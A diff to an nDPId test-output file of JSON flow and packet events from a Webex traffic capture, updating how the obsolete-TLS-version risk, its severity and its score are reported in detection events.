{"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"}
@@ -90,20 +90,20 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"}
@@ -111,36 +111,36 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"}
